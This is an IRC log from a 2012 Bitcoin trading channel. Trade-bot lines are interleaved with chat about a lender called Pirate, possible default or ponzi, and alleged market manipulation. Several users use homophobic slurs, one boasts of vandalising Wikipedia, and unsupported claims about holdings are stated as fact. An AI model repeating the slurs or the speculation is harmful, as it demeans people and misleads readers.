19 01:00:45 [GLBSE] [JAH] 50 @ 0.13 = 6.5 BTC [+] Aug 19 01:07:12 [GLBSE] [ASICMINER] 198 @ 0.105 = 20.79 BTC [+] Aug 19 01:07:14 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [+] Aug 19 01:07:15 [GLBSE] [ASICMINER] 500 @ 0.105 = 52.5 BTC [+] Aug 19 01:07:15 [GLBSE] [ASICMINER] 50 @ 0.105 = 5.25 BTC [+] Aug 19 01:08:38 [GLBSE] [BITCOINMINV] 5 @ 0.12293 = 0.6147 BTC [-] Aug 19 01:09:07 [GLBSE] [BITCOINMINV] 3 @ 0.12293 = 0.3688 BTC [-] Aug 19 01:09:27 [GLBSE] [BITCOINMINV] 1 @ 0.12293 BTC [-] Aug 19 01:10:59 [GLBSE] [PPT.B] 1 @ 1.1799 BTC [+] Aug 19 01:11:17 [GLBSE] [BITCOINMINV] 3 @ 0.12293 = 0.3688 BTC [-] Aug 19 01:11:19 [GLBSE] [PPT.B] 4 @ 1.1799 = 4.7196 BTC [+] Aug 19 01:11:20 [GLBSE] [PPT.B] 4 @ 1.18 = 4.72 BTC [+] Aug 19 01:11:43 [GLBSE] [PPT.B] 1 @ 1.1798 BTC [-] Aug 19 01:13:12 [GLBSE] [BITCOINMINV] 2 @ 0.12293 = 0.2459 BTC [-] Aug 19 01:14:53 [GLBSE] [GIPPT] 5 @ 0.95 = 4.75 BTC [-] Aug 19 01:15:30 [GLBSE] [TYGRR.BOND-P] 17 @ 0.73 = 12.41 BTC [+] Aug 19 01:15:32 [GLBSE] [TYGRR.BOND-P] 10 @ 0.73999999 = 7.4 BTC [+] Aug 19 01:15:32 [GLBSE] [TYGRR.BOND-P] 53 @ 0.749999 = 39.7499 BTC [+] Aug 19 01:15:34 [GLBSE] [GIGAMINING] 21 @ 1.025 = 21.525 BTC [+] Aug 19 01:15:50 [GLBSE] [GIGAMINING] 1 @ 1.026 BTC [+] Aug 19 01:16:46 [GLBSE] [TYGRR.BOND-P] 8 @ 0.749999 = 6 BTC [+] Aug 19 01:16:46 [GLBSE] [TYGRR.BOND-P] 50 @ 0.7599989 = 37.9999 BTC [+] Aug 19 01:22:53 [GLBSE] [GIPPT] 5 @ 0.95 = 4.75 BTC [-] Aug 19 01:24:23 [MPEX] [F.GIGA.ETF] 7912 @ 0.00092816 = 7.3436 BTC [-] Aug 19 01:24:25 [MPEX] [F.GIGA.ETF] 10088 @ 0.00092586 = 9.3401 BTC [-] Aug 19 01:27:08 [GLBSE] [FOO.PPPPT] 2 @ 0.6011 = 1.2022 BTC [+] Aug 19 01:27:21 [MPEX] [S.MPOE] 36400 @ 0.00039346 = 14.3219 BTC [+] Aug 19 01:27:55 [GLBSE] [FOO.PPPPT] 25 @ 0.601 = 15.025 BTC [-] Aug 19 01:32:55 [GLBSE] [TYGRR.BOND-P] 1 @ 0.6121 BTC [-] Aug 19 01:34:18 [GLBSE] [FOO.PPPPT] 3 @ 0.6011 = 1.8033 BTC [+] Aug 19 01:35:17 [GLBSE] [FPGAMINING] 1 @ 0.921 BTC [+] Aug 19 01:39:37 [MPEX] [S.MPOE] 21360 @ 0.00039311 = 8.3968 BTC [-] Aug 19 01:39:38 [MPEX] [S.MPOE] 22800 @ 0.0003885 = 8.8578 BTC [-] Aug 19 01:39:40 [MPEX] [S.MPOE] 11840 @ 0.0003824 = 4.5276 BTC [-] Aug 19 01:43:05 [MPEX] [S.MPOE] 700 @ 0.0003824 = 0.2677 BTC [-] Aug 19 01:45:23 [GLBSE] [YABMC] 20 @ 0.1249 = 2.498 BTC [+] Aug 19 02:00:54 [GLBSE] [OBSI.HRPT] 158 @ 0.10288 = 16.255 BTC [+] Aug 19 02:00:56 [GLBSE] [OBSI.HRPT] 6 @ 0.1029 = 0.6174 BTC [+] Aug 19 02:00:57 [GLBSE] [OBSI.HRPT] 836 @ 0.103 = 86.108 BTC [+] Aug 19 02:02:47 [GLBSE] [OBSI.HRPT] 1000 @ 0.103 = 103 BTC [+] Aug 19 02:04:51 [GLBSE] [BITCOINMINV] 27 @ 0.1219999 = 3.294 BTC [-] Aug 19 02:07:15 [GLBSE] [MMM] 2 @ 0.799 = 1.598 BTC [+] Aug 19 02:07:55 [GLBSE] [MMM] 2 @ 0.8 = 1.6 BTC [+] Aug 19 02:12:38 [GLBSE] [NASTY] 1 @ 0.5499 BTC [-] Aug 19 02:22:36 [GLBSE] [OBSI.HRPT] 1 @ 0.1005 BTC [-] Aug 19 02:22:37 [GLBSE] [OBSI.HRPT] 12 @ 0.1001 = 1.2012 BTC [-] Aug 19 02:22:39 [GLBSE] [OBSI.HRPT] 1 @ 0.10001 BTC [-] Aug 19 02:22:40 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 19 02:23:27 [GLBSE] [YARR] 4 @ 1 = 4 BTC [+] Aug 19 02:28:16 [GLBSE] [MOVETO.FUND] 1 @ 1.17268084 BTC [+] Aug 19 02:28:56 [GLBSE] [MOVETO.FUND] 30 @ 1.17268084 = 35.1804 BTC [+] Aug 19 02:29:54 [GLBSE] [MOVETO.FUND] 7 @ 1.17268084 = 8.2088 BTC [+] Aug 19 02:31:02 [MPEX] [S.MPOE] 8153 @ 0.00039346 = 3.2079 BTC [+] Aug 19 02:31:14 [GLBSE] [RAREEARTH] 10 @ 0.00906 = 0.0906 BTC [-] Aug 19 02:31:16 [GLBSE] [RAREEARTH] 2 @ 0.00905 = 0.0181 BTC [-] Aug 19 02:31:17 [GLBSE] [RAREEARTH] 48 @ 0.00900001 = 0.432 BTC [-] Aug 19 02:31:55 [GLBSE] [FUTUREFUND] 7225 @ 0.00008011 = 0.5788 BTC [-] Aug 19 02:31:56 [GLBSE] [FUTUREFUND] 10 @ 0.00008 = 0.0008 BTC [-] Aug 19 02:33:41 [MPEX] [S.MPOE] 364 @ 0.00039346 = 0.1432 BTC [+] Aug 19 02:33:42 [MPEX] [S.MPOE] 39300 @ 0.00039353 = 15.4657 BTC [+] Aug 19 02:33:44 [MPEX] [S.MPOE] 5136 @ 0.00039355 = 2.0213 BTC [+] Aug 19 02:34:56 [GLBSE] [TYGRR.BOND-P] 1 @ 0.8489 BTC [+] Aug 19 02:35:14 [GLBSE] [MOVETO.FUND] 1 @ 1.17268084 BTC [+] Aug 19 02:35:58 [GLBSE] [BITCOINRS] 4 @ 0.0499 = 0.1996 BTC [-] Aug 19 02:46:19 [MPEX] [S.MPOE] 11000 @ 0.00039355 = 4.3291 BTC [+] Aug 19 02:54:07 [GLBSE] [TYGRR.BOND-PI] 1 @ 0.82 BTC [-] Aug 19 02:56:48 huh...anyone want to offload some TYGRR.BOND-PI? Aug 19 02:57:17 I'll offload for 1.2 BTC Aug 19 02:57:21 j/k Aug 19 02:57:54 I am surprised to see it below 1. I trust chaang, to about 1 BTC each on those:D Aug 19 02:57:59 i have some TYGRR.BOND-P Aug 19 02:58:46 how much and how many plusEV? Aug 19 02:59:41 77 at .85 Aug 19 03:01:05 I can get it off the market for less so I will have to pass for now. Thank you though. Aug 19 03:01:22 Fear and panic seems to have set in today? Aug 19 03:02:18 ok Aug 19 03:02:23 I will do .8 Aug 19 03:03:32 I guess you don't think the deposits will be returned...or btc will lose too much value before they are? Aug 19 03:03:44 i don't know about btc price Aug 19 03:03:58 but I think there is a chance pirate will not pay back Aug 19 03:06:21 [GLBSE] [OBSI.1MHS] 2 @ 0.09989 = 0.1998 BTC [+] Aug 19 03:09:34 [GLBSE] [TYGRR.BOND-P] 1 @ 0.6201 BTC [-] Aug 19 03:13:52 [MPEX] [F.GIGA.ETF] 3258 @ 0.00095759 = 3.1198 BTC [+] Aug 19 03:16:50 [GLBSE] [TYGRR.BOND-B] 250 @ 0.1 = 25 BTC [-] Aug 19 03:17:45 [GLBSE] [GREEN] 1 @ 0.749 BTC [-] Aug 19 03:24:02 [MPEX] [F.GIGA.ETF] 9100 @ 0.00097057 = 8.8322 BTC [+] Aug 19 03:25:22 [GLBSE] [FOO.PPPPT] 1 @ 0.7987 BTC [+] Aug 19 03:30:59 [GLBSE] [YARR] 50 @ 0.991 = 49.55 BTC [-] Aug 19 03:31:55 [MPEX] [S.MPOE] 2525 @ 0.00039355 = 0.9937 BTC [+] Aug 19 03:36:11 [GLBSE] [TYGRR.BOND-P] 1 @ 0.6203 BTC [+] Aug 19 03:36:40 [GLBSE] [FOO.PPPPT] 1 @ 0.6103 BTC [-] Aug 19 03:39:50 smickles hmmm, app.net. i got a trade rss. Aug 19 03:40:14 [GLBSE] [PUREMINING] 2 @ 0.13899999 = 0.278 BTC [-] Aug 19 03:40:44 [GLBSE] [YABMC] 2 @ 0.1249 = 0.2498 BTC [+] **** BEGIN LOGGING AT Sun Aug 19 12:11:59 2012 Aug 19 12:12:10 oh no its mircea_popescu Aug 19 12:12:16 ono! Aug 19 12:12:28 EskimoBob: I do not trust pirate Aug 19 12:12:50 Then sniping passthroughs was a bad idea Aug 19 12:12:54 dust-otc: how much are you selling for Aug 19 12:13:05 current ask Aug 19 12:13:05 dust-otc: nor do I but so far he has made sure hes good for what ever he said Aug 19 12:13:13 [GLBSE] [SILVER] 400 @ 0.009 = 3.6 BTC [-] Aug 19 12:13:20 Eskimobob: but this is the hardest part to make good on :) Aug 19 12:13:29 dust-otc: right I'll just check Aug 19 12:13:35 Look Pirate is going to pay back Aug 19 12:13:37 0.79* Aug 19 12:13:40 and I think those guys think bigger that 10K+ coins :) Aug 19 12:13:41 After he crashes the market to $8 Aug 19 12:14:02 If he's drunk Aug 19 12:14:06 We're going to $1 Aug 19 12:14:17 that would be rad Aug 19 12:14:28 ;;last Aug 19 12:14:28 [02:14:17] that would be rad Aug 19 12:14:38 ;;last Aug 19 12:14:38 [02:14:28] ;;last Aug 19 12:14:44 no, this is not right Aug 19 12:14:51 I thought sniping passthroughs was a good idea, because I could buy after I knew interest was paid, but before the passthrough ops paid out divs Aug 19 12:14:53 hm ,,last Aug 19 12:15:03 and then sell before next week when pirate had a chance to default Aug 19 12:15:10 how do you get the bid/ask/last quote Aug 19 12:15:25 well dust-otc it sounds like less risk than just holding... Aug 19 12:15:32 [GLBSE] [FOO.PPPPT] 5 @ 0.969 = 4.845 BTC [+] Aug 19 12:15:40 less risk, less profit Aug 19 12:15:47 ;;asks 11 Aug 19 12:15:47 Error: Failure to retrieve order book data. Try again later. Aug 19 12:15:56 gribs been snubbing me on those requests all night Aug 19 12:15:59 ;;market sell 100000 Aug 19 12:15:59 Error: Failure to retrieve order book data. Try again later. Aug 19 12:16:01 [GLBSE] [BIB.PIRATE] 1 @ 0.9899 BTC [+] Aug 19 12:16:06 *middle finger* Aug 19 12:16:18 who is buying passthroughs at that price Aug 19 12:16:26 .99 really? Aug 19 12:16:29 great question:) theres a few better deals to be had Aug 19 12:16:51 dust-otc: ones who are sure the pirate promises are good Aug 19 12:17:03 only pirate himself, if he is legit, should be buying at .99 Aug 19 12:17:34 dust-otc: you are too depressing for so late afternoon Aug 19 12:17:47 dust-otc: table scraps? this dude is aballer Aug 19 12:18:27 in the 30 seconds each fucking click takes on GLBSE he probably makes 5 btc Aug 19 12:18:44 [MPEX] [F.GIGA.ETF] 7400 @ 0.00100227 = 7.4168 BTC [+] Aug 19 12:19:19 well fire up an mtgox bot then dub:) Aug 19 12:19:26 dub: I'm just saying the only way it would be +EV to buy passthroughs at .99 is if you were pirate Aug 19 12:23:12 lol @ "I would like an option to buy 2100 Bitcoins for $100 each on December, 2013" Aug 19 12:24:28 [MPEX] [S.MPOE] 32300 @ 0.00037106 = 11.9852 BTC [+] Aug 19 12:24:45 dust-otc the onwers prolly. Aug 19 12:24:57 EskimoBob: What's so funny about that? Aug 19 12:25:03 [MPEX] [S.MPOE] 2400 @ 0.00037106 = 0.8905 BTC [+] Aug 19 12:25:04 the only people who are on the hook for 1 anyway and don't want panic. Aug 19 12:25:05 [MPEX] [S.MPOE] 19500 @ 0.00037297 = 7.2729 BTC [+] Aug 19 12:25:06 [MPEX] [S.MPOE] 19700 @ 0.00037635 = 7.4141 BTC [+] Aug 19 12:25:13 I considered that, the issuer, but there ar emroe at that price and the entity only chose to buy 1. Aug 19 12:25:22 so ? Aug 19 12:25:29 why buy 1 Aug 19 12:25:40 to create at least a minimum impression of movement Aug 19 12:25:53 why would the issuer buy for such an high price? Aug 19 12:25:55 it has that impression regardless of the sale of 1 share Aug 19 12:25:59 bond* Aug 19 12:26:08 are they really 99% sure of pirate Aug 19 12:26:09 dust-otc aren't they insured ? he owes 1 on them anyway Aug 19 12:26:29 EskimoBob i wouldn't underwrite that. Aug 19 12:26:39 i'm talking about the recent FOO.PPPT and BIB.PIRATE trades, both uninsured Aug 19 12:26:48 o o Aug 19 12:26:50 [GLBSE] [TYGRR.BOND-P] 6 @ 0.789 = 4.734 BTC [+] Aug 19 12:27:14 well that i dunno, but maybe its still the issuer toying with the ideea Aug 19 12:27:53 it's possible. the issue entered this room shortly before one of the buys, but didnt even say hi to us scrubs Aug 19 12:27:56 [MPEX] [S.MPOE] 2100 @ 0.00037635 = 0.7903 BTC [+] Aug 19 12:27:57 [MPEX] [S.MPOE] 6953 @ 0.00037748 = 2.6246 BTC [+] Aug 19 12:28:10 lmao Aug 19 12:28:11 issuer entered* Aug 19 12:28:17 many people have bots for irc. Aug 19 12:29:24 lol Aug 19 12:29:31 USD only has one thousand dollars in it Aug 19 12:29:43 yeah, and its...unusable pretty much Aug 19 12:29:57 great diea for an asset though if you could have it liquid and update the price frequently Aug 19 12:30:49 get the bid/ask spread low...Id use it to hedge at times, I couldnt be the only one. Aug 19 12:31:56 I figured out what's holding back Bitcoin. Aug 19 12:32:10 Bitcoin.org and its shitty client Aug 19 12:32:40 so make a new one. Aug 19 12:33:08 Already done but Bitcoin.org is still stuck on being "official" Aug 19 12:33:18 I mean, there are plenty of great clients out there Aug 19 12:33:25 they just aren't marketed well enough Aug 19 12:33:42 Can you recommend one/some? Aug 19 12:34:35 http://brainwallet.org is cool but needs work Aug 19 12:34:47 so basically they suck more. Aug 19 12:35:02 http://blockchain.info needs a updated md5 hash for the server's software Aug 19 12:35:05 or something Aug 19 12:35:11 but that's the concept of the future right htere Aug 19 12:35:14 there* Aug 19 12:35:29 Web clients with actually encrypted wallets are where its at. Aug 19 12:35:39 hi scrubs :) Aug 19 12:35:46 ha, i figured as much Aug 19 12:36:00 how was your weekend? Aug 19 12:36:02 [MPEX] [S.MPOE] 507 @ 0.00038937 = 0.1974 BTC [+] Aug 19 12:36:04 [MPEX] [S.MPOE] 4193 @ 0.0003965 = 1.6625 BTC [+] Aug 19 12:36:12 [GLBSE] [ASICMINER] 5 @ 0.09879999 = 0.494 BTC [-] Aug 19 12:36:14 [GLBSE] [ASICMINER] 40 @ 0.09889999 = 3.956 BTC [+] Aug 19 12:36:15 [GLBSE] [ASICMINER] 6 @ 0.099 = 0.594 BTC [+] Aug 19 12:36:19 my irc automatically reconnects when I open my computer, it often takes some time to catch up on everything Aug 19 12:36:30 no, those trades weren't me. Aug 19 12:36:48 Weekend fine so far, halfway through. very hot here! Aug 19 12:36:53 [MPEX] [S.MPOE] 10047 @ 0.00038846 = 3.9029 BTC [-] Aug 19 12:36:53 things are so slow that was all voer the tarde of 1 share of bib.pirate and i forget how few foo's:P Aug 19 12:36:54 [MPEX] [S.MPOE] 11453 @ 0.00037096 = 4.2486 BTC [-] Aug 19 12:37:51 I quit counting Sunday into my weekends because the currency market spring to life in the evening so I usually watch that. Aug 19 12:40:46 [MPEX] [O.BTCUSD.C100T] 4 @ 0.18281868 = 0.7313 BTC [-] Aug 19 12:40:47 [MPEX] [O.BTCUSD.C080N] 2 @ 0.44071232 = 0.8814 BTC [+] Aug 19 12:42:22 going out for a walk in the forest soon. Aug 19 12:42:32 where are you at? Aug 19 12:42:43 Germany at the moment Aug 19 12:43:04 [GLBSE] [TYGRR.BOND-P] 20 @ 0.72 = 14.4 BTC [-] Aug 19 12:43:07 oh nice. I have never left the continental USA. I would like to some day. Aug 19 12:43:13 hi brendio :p Aug 19 12:43:37 Ignatius-otc you absolutely must. Aug 19 12:43:43 hi and soon bye Aug 19 12:44:20 tada hehe Aug 19 12:49:49 [GLBSE] [TYGRR.BOND-B] 1 @ 0.1 BTC [-] Aug 19 12:50:09 [MPEX] [S.MPOE] 10500 @ 0.0003965 = 4.1633 BTC [+] Aug 19 12:55:49 [GLBSE] [ASICMINER] 2 @ 0.099 = 0.198 BTC [+] Aug 19 12:59:03 [GLBSE] [NYAN.B] 100 @ 1 = 100 BTC [-] Aug 19 13:01:49 [GLBSE] [BITNODES] 4 @ 0.243 = 0.972 BTC [+] Aug 19 13:02:02 [GLBSE] [TYGRR.BOND-B] 7 @ 0.1002 = 0.7014 BTC [+] Aug 19 13:03:28 Obsi: pay the dividends already Aug 19 13:03:57 [GLBSE] [BITNODES] 4 @ 0.243 = 0.972 BTC [+] Aug 19 13:07:01 amazing how meaningless 1% per week feels now Aug 19 13:07:06 lol Aug 19 13:08:24 [MPEX] [S.MPOE] 2250 @ 0.00037096 = 0.8347 BTC [-] Aug 19 13:08:25 [MPEX] [S.MPOE] 4790 @ 0.00036779 = 1.7617 BTC [-] Aug 19 13:08:26 [MPEX] [S.MPOE] 28060 @ 0.00036743 = 10.3101 BTC [-] Aug 19 13:08:47 what do you guys this is it possible to finance a art studio with GLBSE stock offer? Aug 19 13:10:10 [MPEX] [O.BTCUSD.C160N] 4 @ 0.13421876 = 0.5369 BTC [-] Aug 19 13:10:13 there will be divs when everything gets set up. IPO proceeds are used to buy some equipment. Equipment actually produces revenue because people buy time to use it Aug 19 13:11:16 Fuck Pirate so hard Aug 19 13:11:22 He doesn't even care about Bitcoin Aug 19 13:11:33 He just dumps on the market without a hint of remorse Aug 19 13:12:26 why should he care ?! Aug 19 13:12:54 I guess he isn't obligated to Aug 19 13:12:57 but gosh darn it Aug 19 13:13:07 why did he join in the first place? Aug 19 13:13:15 Does he see any future value in Bitcoin? Aug 19 13:13:15 where you been atlas, we thought you'd e-suicided again Aug 19 13:13:38 of course, hoping you did it for real Aug 19 13:13:39 man Aug 19 13:13:42 so Aug 19 13:13:47 predictinator was down for like 4 days Aug 19 13:13:49 dub, spending my days at Starbucks pissing coffee Aug 19 13:13:51 market was fine Aug 19 13:13:54 predictinator comes back up Aug 19 13:13:58 everyone wakes up the next morning Aug 19 13:14:01 reads predictinator Aug 19 13:14:02 starbucks is not coffee Aug 19 13:14:07 market immediately crashes Aug 19 13:14:21 Don't tell me my Americano is not coffee Aug 19 13:14:22 tl;dr: predictinator controls the market Aug 19 13:14:27 Because I see them brew the espresso Aug 19 13:14:42 Diablo-D3: I'll buy your site if that's true Aug 19 13:15:33 Some fag wants to turn the Bitcoin article on Wikipedia to the Bitcoin-Qt article again. Aug 19 13:15:40 I'll die before that happens. Aug 19 13:15:43 not that shit again Aug 19 13:15:57 Im going to campaign for the web browser page to be turned into the firefox page Aug 19 13:16:06 IMPLEMENTATION == SPECIFICATION Aug 19 13:16:08 IMPLEMENTATION == SPECIFICATION Aug 19 13:16:08 IMPLEMENTATION == SPECIFICATION Aug 19 13:16:08 IMPLEMENTATION == SPECIFICATION Aug 19 13:16:08 IMPLEMENTATION == SPECIFICATION Aug 19 13:16:12 HERP DERP Aug 19 13:16:14 HERP DERP Aug 19 13:16:38 fucking wikipedia Aug 19 13:16:41 the trash of the internet Aug 19 13:16:42 I bet its some Bitcoin-Qt developer who wants take all the credit for Bitcoin's current success. Aug 19 13:16:50 EmanuelDeOrtego: who, satoshi? Aug 19 13:17:00 No, Satoshi would be pissed off. Aug 19 13:17:07 you missed the point Aug 19 13:17:16 Either Gmaxwell or Andresen Aug 19 13:17:19 most of the code still is satoshis, everyone else just refined it Aug 19 13:17:29 Ha, yes, now I get you Aug 19 13:17:30 well Aug 19 13:17:47 put a notice in the article that specifies it is not the same as bitcoin-qt Aug 19 13:17:50 even the qt shit was done with qt's tools and copy's satoshis original shit Aug 19 13:17:58 Anduck: that doesnt work Aug 19 13:18:07 put it with cat-sized letters Aug 19 13:18:07 If we had to rely totally on the Bitcoin.org development team, we would be so fucked. Aug 19 13:18:08 and red. Aug 19 13:18:09 the only way to stop wikipedia is to claim wikipedia is non-notable Aug 19 13:18:20 u cant do it Aug 19 13:18:28 just try to stop him from editing it shitway Aug 19 13:18:36 since they cant use other wikipedia pages to claim something is notable, all of wikipedia will have to be deleted as per policy Aug 19 13:18:56 think about normal users Aug 19 13:18:58 just keep it simple Aug 19 13:19:03 people use wikipedia Aug 19 13:19:05 and will use Aug 19 13:19:13 dude, if you use wikipedia, you're a fucktard Aug 19 13:19:26 well, then 95% of internet people are fucktards Aug 19 13:19:30 YES. Aug 19 13:19:32 YES THEY ARE. Aug 19 13:19:35 Anduck, I'll have to do that during an edit war Aug 19 13:19:45 :D Aug 19 13:19:46 yeah Aug 19 13:20:02 I once used a throwaway account over tor to edit GWB's article to say hes actually a reptile in human guise Aug 19 13:20:07 Because some shithead is going to go BITCOIN.ORG IS THE BESTEST FUCK CAPITALIST PIGS IMPROVING BITCOIN Aug 19 13:20:11 no one reverted it for days Aug 19 13:20:22 lol Aug 19 13:20:40 [MPEX] [S.MPOE] 3969 @ 0.00036743 = 1.4583 BTC [-] Aug 19 13:21:05 Pirate is having a hard time with the market. Aug 19 13:21:39 He has 20,000 Bitcoins to go through before he can buy in at his preferred $8 price Aug 19 13:21:52 [MPEX] [S.MPOE] 12447 @ 0.00036743 = 4.5734 BTC [-] Aug 19 13:21:53 [MPEX] [S.MPOE] 11253 @ 0.00036483 = 4.1054 BTC [-] Aug 19 13:23:59 Oh damn, the price dropped again! Aug 19 13:24:10 Yep, Pirate wants it at $8 Aug 19 13:24:15 Then he can buyback Aug 19 13:24:18 Pay his investors Aug 19 13:24:27 huh Aug 19 13:24:32 thats pretty smart of him Aug 19 13:24:32 He would of paid them all off otherwise Aug 19 13:24:46 Ah, he made a claim about that? Aug 19 13:25:10 This is all speculation on my part but I did see him get butthurt when it went over 9 Aug 19 13:25:37 It all matches up though. I mean, why hasn't he paid off his investors yet? Aug 19 13:25:55 Why did he close down at the $15 mark? Aug 19 13:26:02 NYAN news! https://bitcointalk.org/index.php?topic=97178.msg1112462#msg1112462 Aug 19 13:26:30 ;;ticker Aug 19 13:26:30 Best bid: 9.64999, Best ask: 9.65, Bid-ask spread: 0.00001, Last trade: 9.65, 24 hour volume: 121860, 24 hour low: 9.51, 24 hour high: 12.192 Aug 19 13:27:08 All matches up? Tell me, how could he lower the price so much? Aug 19 13:27:25 There was at one point over half a million dollars from 10 to 14 Aug 19 13:27:31 He burned through all that, really? Aug 19 13:27:46 BTC-Mining: The man has a mixed holding of USD and Bitcoin Aug 19 13:27:49 Sounds a little unbelievable but who knows Aug 19 13:27:54 Over hundreds of thousands of Bitcoins Aug 19 13:28:07 He needs his USD in Bitcoins to pay off his investors Aug 19 13:28:30 So what does he do? Aug 19 13:28:45 fuck my internet tonight Aug 19 13:28:47 He dumps his Bitcoins gradually with hopes of buying those back plus his investors cost. Aug 19 13:29:02 and fuck debian Aug 19 13:29:05 bash: telnet: command not found Aug 19 13:29:10 Makes no sense, his bids would force the price up right back Aug 19 13:29:10 what the fuck Aug 19 13:29:25 There's a much stronger demand then asks Aug 19 13:29:37 He never makes bids Aug 19 13:29:44 He buys at market rates he likes Aug 19 13:30:13 Again, take what you wish from me but I've seen him play the market before. Aug 19 13:30:24 The guy has a lot of money Aug 19 13:30:43 He has over 400,000 Bitcoins Aug 19 13:30:47 That can take the market to $1 Aug 19 13:30:48 maybe he crashes btc-e and not mtgox is following? or vice versa Aug 19 13:31:01 Yes, that may be the case. Aug 19 13:31:18 now* Aug 19 13:31:28 he doesnt have over 400k coins Aug 19 13:31:35 he OWES over 400k coins Aug 19 13:31:44 Doesn't matter Aug 19 13:31:48 Those coins are in his hands Aug 19 13:31:51 and he plays with them Aug 19 13:31:52 is there a thread about this stuff Aug 19 13:31:53 ? Aug 19 13:32:00 they arent in his hands Aug 19 13:32:01 imo he doesnt have that much Aug 19 13:32:05 where did u get that 400k? Aug 19 13:32:08 pure speculations... -.- Aug 19 13:32:13 yeah Aug 19 13:32:18 Anduck: estimates from interest payments Aug 19 13:32:18 if he crashes the market with them Aug 19 13:32:24 ok Aug 19 13:32:28 and then buys them back at a much cheaper price Aug 19 13:32:29 he wins Aug 19 13:32:44 [MPEX] [S.MPOE] 31009 @ 0.00036997 = 11.4724 BTC [+] Aug 19 13:32:49 yes Aug 19 13:32:51 i think you guys are overestimating the profitability of this kind of manipulation Aug 19 13:32:56 The guy is a retired 40 year old and this is his side project Aug 19 13:33:03 dust-otc: The market is so puny Aug 19 13:33:04 if you sell to crash, you are selling some of your coins low Aug 19 13:33:17 Not if you project it on the volumes correctly Aug 19 13:33:37 The market is easily quantified Aug 19 13:33:41 This is not rocket science Aug 19 13:33:44 yes, but what if you have 400k Aug 19 13:33:45 nor a typical market Aug 19 13:33:52 you sell from $15 the whole way down to $5 Aug 19 13:33:56 then you buy from $1 up to $5 Aug 19 13:34:03 you now have 400k coins Aug 19 13:34:10 you also have a fuckton of usd Aug 19 13:34:15 how does price go from $5 to $1 Aug 19 13:34:20 panic Aug 19 13:34:21 when someone sells down to $5 Aug 19 13:34:25 panic Aug 19 13:34:32 That's only 100,000 Bitcoins or so Aug 19 13:34:40 its standard panic intertia Aug 19 13:34:45 It takes nothing to make that happen from the view of a retired man with decent savings Aug 19 13:34:50 if the price crashes to $5 and it isn't due to some sort of illegality Aug 19 13:34:56 who is selling then? Aug 19 13:34:59 i would be buying Aug 19 13:35:11 Hence why we are headed back to $10 Aug 19 13:35:16 Noone said it was easy Aug 19 13:35:29 His whole strategy relies on not being detected Aug 19 13:35:34 Else the market will write him off Aug 19 13:35:45 dust-otc: thats the thing Aug 19 13:35:47 markets are VERY efficient Aug 19 13:35:53 you will see the effect of the news before you see the news Aug 19 13:36:05 The demand is still strong... and it is increasing as prices drop Aug 19 13:36:12 but if the price crashes to $5, I will check the news before I panic to $1 Aug 19 13:36:14 so if it flash crashes the whole way from $15 to $5, people are going to sell THEN google for "bitcoin illegal fbi" Aug 19 13:36:16 Markets. It just works. Aug 19 13:36:33 DiabloD3: that is an incorrect assumption Aug 19 13:36:35 dust-otc: thats you, and thats also me Aug 19 13:36:38 but we're not 99% of people Aug 19 13:36:48 nope, its a 100% correct assumption Aug 19 13:36:54 people are fucking stupid Aug 19 13:37:01 doublely so when they panic Aug 19 13:37:37 [GLBSE] [ASICMINER] 33 @ 0.099 = 3.267 BTC [+] Aug 19 13:37:41 This is exactly why I don't sell my bitcoins... I see too much bids and low asks Aug 19 13:37:48 The drop is due to large sales... Aug 19 13:37:57 I' Aug 19 13:37:57 certainly related to pirate closing Aug 19 13:37:58 er Aug 19 13:38:04 I think either pirate is in a very tough spot, or was straight running a ponzi Aug 19 13:38:07 I'd rather default on credit cards before selling bitcoins Aug 19 13:38:12 But I'm not betting as to when they go back up Aug 19 13:38:22 It will stabilize to $10 on Monday Aug 19 13:38:25 either way, he might not be able to pay back Aug 19 13:38:32 dust-otc, seeing how it ended, I would think the same thing Aug 19 13:38:34 else Pirate refuses to go into the red Aug 19 13:38:38 EmanuelDeOrtego: why do you think Pirate is dumping BTC? He needs a assload of it next week Aug 19 13:38:51 You have to get started some time Aug 19 13:38:58 He needs a week or so to collect Aug 19 13:39:11 do u think pirate will pay? Aug 19 13:39:15 Yes Aug 19 13:39:18 Else he is dead Aug 19 13:39:22 People know him Aug 19 13:39:23 unfortunately for pirate, if he can't pay back, his scheme is indistinguishable from a ponzi Aug 19 13:39:29 The way to have done it would have been to put a humongous ask wall of 400k BTC at 10$ Aug 19 13:39:32 EmanuelDeOrtego: so you are pulling those facts out of your ass? Aug 19 13:39:33 [GLBSE] [GIGAMINING] 2 @ 1.01 = 2.02 BTC [-] Aug 19 13:39:43 EskimoBob: I am not stating anything empirical Aug 19 13:39:47 That should have made the market unenthusiastic about buying Aug 19 13:40:00 People see right through ask walls Aug 19 13:40:05 just bullshiting? Aug 19 13:40:18 Nah, I am trading off this information Aug 19 13:40:28 Yes, but would have still required a huge volume Aug 19 13:40:47 [GLBSE] [FOO.PPPPT] 2 @ 0.6201 = 1.2402 BTC [-] Aug 19 13:40:47 so you are lying and manipulating market with bull shit to make few pennies? Aug 19 13:41:12 Nope Aug 19 13:41:18 or you think that market reacts to your load of crap and it makes you feel good? Aug 19 13:41:20 I don't think people are that stupid Aug 19 13:41:26 EmanuelDeOrtego = atlas ?! Aug 19 13:41:33 Yes Aug 19 13:42:00 The facts are Pirate is low on Bitcoins and he can't profitably buy at these current prices. Aug 19 13:42:18 how do you know that? Aug 19 13:42:23 Either Gmaxwell << prolly gmaxwell. he's the sort of useless faggot that tries to prop his idiocy through administrative crap. Aug 19 13:42:26 That isn't a fact.... Aug 19 13:42:38 [GLBSE] [JAH] 100 @ 0.13 = 13 BTC [+] Aug 19 13:42:46 who's atlas? Aug 19 13:42:47 His account balances are easily seen. I need to recheck them. Aug 19 13:42:50 did your ass told you this fact EmanuelDeOrtego? Aug 19 13:43:01 Look, write me off if that is your nature. Aug 19 13:43:04 atlas is this faggot troll on the forums Aug 19 13:43:05 hes going by p4man now Aug 19 13:43:10 lol Aug 19 13:43:11 no Aug 19 13:43:37 You have no obligation to respect my speculation Aug 19 13:43:45 p4man is not that bad at all but "EmanuelDeOrtego" character is a joke Aug 19 13:43:57 RESPECT MAH AUTHORITAH dot jaypeg. Aug 19 13:44:04 btw, what happened to the 10k btc bet with pirate and vandroiyu ormsmth? Aug 19 13:44:08 EskimoBob: psst, EmanuelDeOrtego IS atlas Aug 19 13:44:15 Well KRAKEN is IPOing soon on GLBSE Aug 19 13:44:15 EskimoBob: The fact you are emotionally 